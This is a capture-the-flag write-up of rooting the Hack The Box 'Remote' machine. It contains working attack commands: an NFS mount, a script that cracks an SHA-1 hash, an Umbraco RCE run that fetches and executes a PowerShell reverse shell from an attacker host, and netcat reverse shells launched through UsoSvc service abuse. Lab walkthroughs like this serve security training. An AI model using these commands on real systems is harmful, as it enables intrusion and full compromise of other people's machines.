[ Remote ] - HACKTHEBOX




Hello everyone. Today I will show how I rooted the Remote machine from HackTheBox. As usual we need some information about the exposed services first, so we start by enumerating the box.
Tool name: nmap
nmap is used for information gathering: here a service/version scan with the default NSE scripts and OS detection (-A -sV -sC), saved to a file with -oN.

# Nmap 7.80 scan initiated Sat Jul 18 10:21:24 2020 as: nmap -A -sV -sC -oN remote.nmap remote.htb
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/28%OT=21%CT=1%CU=41603%PV=Y%DS=2%DC=T%G=Y%TM=5E7F259
OS:2%P=x86_64-unknown-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%CI=I%TS=U)SEQ(SP=1
OS:08%GCD=1%ISR=10D%TS=U)SEQ(SP=108%GCD=1%ISR=10D%CI=I%II=I%TS=U)OPS(O1=M54
OS:DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)
OS:WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=
OS:FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%
OS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m08s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-28T10:27:01
|_  start_date: N/A

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   225.12 ms 10.10.14.1
2   225.38 ms remote.htb (10.10.10.180)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 18 10:23:14 2020 -- 1 IP address (1 host up) scanned in 109.92 seconds

After the scan, what stands out is rpcbind (111/tcp) together with NFS (2049/tcp) on a Windows host. Windows Server ships an NFS server role, and an export that is readable by everyone hands out files without any credentials at all, so it is worth checking what is exported. The nfs-showmount NSE script lists the exports (showmount -e remote.htb gives the same answer if rpcbind is reachable):

# Nmap 7.80 scan initiated Sat Jul 18 12:48:06 2020 as: nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.29s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp  open  rpcbind?
| nfs-showmount: 
|_  /site_backups 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
| nfs-showmount: 
|_  /site_backups 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 18 12:50:06 2020 -- 1 IP address (1 host up) scanned in 119.88 seconds

Now we can see the NFS export, named /site_backups. It mounts without any authentication, because NFS only trusts the UID the client presents. Open a new terminal window and mount it (add ro to the -o options if you want to be sure nothing gets written back to the share):

$ sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt


Enumerating every file on the share takes a while over this link. The share turns out to be a backup of the Umbraco site that is served on port 80, and among its files is Umbraco.sdf, a SQL Server Compact database; Umbraco keeps its back-office users, including their password hashes, in that database. The site needs credentials to log in to the CMS, so I expected the admin credentials to be inside Umbraco.sdf. Without SQL Server Compact tooling on Linux, strings is enough to pull the readable records out of the binary file:

strings Umbraco.sdf | grep admin

The matching output looks like this (the fields of a user record are stored back to back, so strings prints them with no separators):

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa
{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50


The 40-hex-character string b8be16afba8c314ad33d812f22a04991b90e2aaa glued to the admin e-mail is the password hash, and the JSON fragment on the next line tells us the algorithm: {"hashAlgorithm":"SHA1"}, i.e. unsalted SHA-1. A hash is not decrypted but cracked: hashcat -m 100 with a wordlist, or an online lookup table, recovers the password baconandcheese. So we now have credentials for the Umbraco back office: username admin@htb.local, password baconandcheese. With a valid back-office login, the Umbraco version running here has a public authenticated remote code execution exploit (noraj/Umbraco-RCE on GitHub, a Python rewrite of the original exploit); note that the CVE is for the Umbraco CMS itself, not for the .sdf file. Rather than working through the exploit's raw output, I use it to run a PowerShell download cradle and catch the resulting reverse shell with a Metasploit handler, which gives a more comfortable shell.
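As an added example (this is not code from the original post or from any Umbraco tooling), here is a small Python script that parses the two strings lines above into a user record and then cracks the SHA-1 hash against a candidate list the way hashcat -m 100 would. The record text is copied from the post; the mini wordlist is constructed for the example and stands in for rockyou.txt.

```python
import hashlib
import re

# Constructed from the two `strings Umbraco.sdf | grep admin` lines in the post.
# Umbraco's user table fields are stored back to back, so strings prints them
# with no separators: <login><email><hash>, then <hash-json><email><locale><guid>.
STRINGS_OUTPUT = """\
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa
{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
"""

# First line: a 40-hex-digit hash glued to the end of the e-mail domain. The
# domain is matched lazily so it stops exactly where the 40 hex digits begin.
HASH_LINE = re.compile(r"@(?P<domain>[A-Za-z0-9.-]+?)(?P<hash>[0-9a-f]{40})$")
# Second line: the algorithm JSON, then the e-mail, then a locale such as en-US.
META_LINE = re.compile(
    r'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}'
    r"(?P<email>[\w.+-]+@[A-Za-z0-9.-]+?)(?=[a-z]{2}-[A-Z]{2})"
)


def parse_user_records(text):
    """Pair each hash line with the metadata line that follows it."""
    records = []
    lines = [line for line in text.splitlines() if line.strip()]
    for cur, nxt in zip(lines, lines[1:]):
        h = HASH_LINE.search(cur)
        m = META_LINE.search(nxt)
        if h and m:
            records.append({"email": m["email"], "algorithm": m["alg"], "hash": h["hash"]})
    return records


def crack(record, candidates):
    """Return the candidate whose SHA-1 matches the stored hash, or None.

    Only the unsalted SHA1 scheme seen in this database is handled; anything
    else (e.g. Umbraco's HMACSHA256 scheme) is refused rather than silently
    hashed the wrong way.
    """
    if record["algorithm"].upper() != "SHA1":
        raise NotImplementedError(f"unsupported hashAlgorithm {record['algorithm']}")
    target = record["hash"].lower()
    for pw in candidates:
        if hashlib.sha1(pw.encode()).hexdigest() == target:
            return pw
    return None


# Constructed mini wordlist standing in for rockyou.txt.
CANDIDATES = ["password", "admin", "Umbraco2020", "baconandcheese", "letmein"]

if __name__ == "__main__":
    for rec in parse_user_records(STRINGS_OUTPUT):
        print(rec["email"], rec["algorithm"], rec["hash"], "->", crack(rec, CANDIDATES))
```

The lazy domain match is what makes the first line parseable at all: because every hex digit is also a valid domain character, a greedy match would swallow the hash into the domain. On a real dump, replace CANDIDATES with a file-backed wordlist and keep the NotImplementedError branch, so a record stored with a different hashAlgorithm is not wrongly reported as uncrackable.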

The exploit takes a program and its arguments to run on the target. I point it at powershell.exe with a download cradle that fetches a small PowerShell reverse shell, mini-reverse.ps1, from my machine. Two things have to be in place before running it: the script must be served over HTTP from 10.10.15.84 (for example python3 -m http.server 80 in the directory that holds it), and it must connect back to the port the handler listens on (LPORT is 4444 unless you set it). Fetch the exploit and start the Metasploit handler first:

$ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py -O umbraco_cve.py
$ chmod 775 umbraco_cve.py
$ msfconsole
> use exploit/multi/handler
> set payload payload/windows/x64/shell_reverse_tcp
> set LHOST 10.10.15.84
> set ExitOnSession false
> exploit -j

Now run the exploit against the back office with the credentials we recovered:

$ ./umbraco_cve.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.84/mini-reverse.ps1')"


The handler catches the shell, which runs as the web application's user, and the user flag is in C:\users\Public:

PS C:\users\Public> type user.txt
3a48d481500c0336xxxxxxx4e5224

Now for root. Enumerating the box with PowerUp.ps1 (the privilege-escalation script from the PowerSploit project on GitHub) turns up something interesting: its service checks flag UsoSvc, the Update Orchestrator Service, as a service whose configuration the current user is allowed to change. A service that runs as LocalSystem but lets a low-privileged user rewrite its binary path is a straightforward path to SYSTEM: point the path at our own command, restart the service, and the service control manager runs that command as SYSTEM. PowerUp's Invoke-ServiceAbuse automates exactly that (it rewrites the path, restarts the service, then restores the original path).

Step by step: download PowerUp.ps1 and a netcat binary from the attack box, dot-source PowerUp so its functions exist in the session, and abuse the service to get nc64.exe to call back (a listener such as nc -lvnp 2222 must already be running on 10.10.15.84; c:\temp is assumed to exist):

PS C:\users\Public> invoke-webrequest -Uri http://10.10.15.84/PowerUp.ps1 -OutFile powerup.ps1
PS C:\users\Public> invoke-webrequest -Uri http://10.10.15.84/nc64.exe -OutFile c:\temp\nc64.exe
PS C:\users\Public> . .\powerup.ps1
PS C:\users\Public> Invoke-ServiceAbuse -Name 'UsoSvc' -Command "c:\temp\nc64.exe -e cmd.exe 10.10.15.84 2222"

The same binary can also be run directly as the web user, calling back to a second listener on port 1111, which only gives a cmd.exe at the current privilege level:

PS C:\users\Public> c:\temp\nc64.exe -e cmd.exe 10.10.15.84 1111

The shell that arrives on the 2222 listener is cmd.exe started by the service, so it runs as SYSTEM and the root flag is readable:

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
b3dc833759xxxxxxxxxxxx051f05

There is also a second way to get Administrator on this box, by exploiting the TeamViewer installation, which is not covered here.

Thanks for reading.
